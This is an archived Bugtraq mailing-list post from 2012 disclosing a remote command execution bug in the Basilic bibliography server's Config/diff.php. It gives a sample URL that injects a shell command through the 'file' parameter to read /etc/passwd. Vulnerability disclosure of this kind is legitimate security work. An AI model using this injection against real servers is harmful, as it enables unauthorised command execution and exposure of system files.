Bugtraq mailing list archives

Basilic RCE bug

From: m.razavi777 () gmail com
Date: Sat, 30 Jun 2012 20:45:21 GMT

Hi
Dear Sir

Basilic is  an Automated Bibliography Server for Research Publications Diffusion that use by many research center.
there is a RCE bug in basilic/Config/diff.php s could allow an attacker to run system command in server.
sample:
http://127.0.0.1/basilic/Config/diff.php?file=%26cat%20/etc/passwd&new=1&old=2

Regards
M.Razavi

Current thread:

Basilic RCE bug m . razavi777 (Jul 02)
- <Possible follow-ups>
- Re: Basilic RCE bug larry0 (Jul 06)